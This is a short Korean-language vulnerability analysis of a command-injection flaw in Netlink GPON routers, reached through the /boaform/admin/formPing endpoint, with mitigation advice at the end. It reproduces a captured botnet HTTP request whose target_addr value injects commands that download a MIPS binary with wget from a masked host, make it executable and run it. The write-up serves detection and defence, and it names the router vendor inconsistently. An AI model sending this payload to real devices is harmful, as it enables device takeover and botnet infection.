Netlink GPON은 국내의 가장에서 사용하는 iptime과 같은 와이파이 모뎀입니다.
해당 Netlink 모델에서 원격 코드 실행 취약점이 존재하였습니다.
Netgear 라우터는 원격 공격자가 / boaform / admin / formPing URI에 의한 잘못된 입력 유효성 검사로 인해 시스템에서 임의의 코드를 실행할 수있게 합니다.
공격자는 특수하게 조작 된 요청을 보내이 취약점을 악용하여 시스템에서 임의의 코드를 실행할 수 있습니다
1. Payload
/boaform/admin/formPing
2. 공격구문
POST /boaform/admin/formPing HTTP/1.1
User-Agent: polaris botnet
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
target_addr=;cd /tmp; rm viktor.mips; wget http://xxx.xxx.xxx.xxx:6479/bins/viktor.mips; busybox wget http://xxx.xxx.xxx.xxx:6479/bins/viktor.mips; chmod 777 viktor.mips; ./viktor.mips/&waninf=1_INTERNET_R_VID_154
Polaris botnet은 해커가 User-Agent 이름을 바꾸어 사용하는 경우가 대부분이며 RawData의 정/오탐을 판별 후, 확인이 필요한 부분이다.
formPing()은 웹 서버 프로그램 의 기능 에서 /bin/boaform 요청을 처리 할 때 시스템 ping 명령을 호출하기 전에 매개 변수를 /boaform/admin/forming에서 확인하지 않아 target_addr 명령 삽입이 가능해집니다.
그래서 취약한 시스템을 제어할 수 있습니다.
※ 해결방안
1. 장치 펌웨어를 확인 및 업데이트하고 비활성화해야하는 기본 계정이 있는지 확인해야합니다.
2. 적용 가능한 네트워크에서 다음 IoC를 모니터링하고 차단하는 것이 좋습니다.
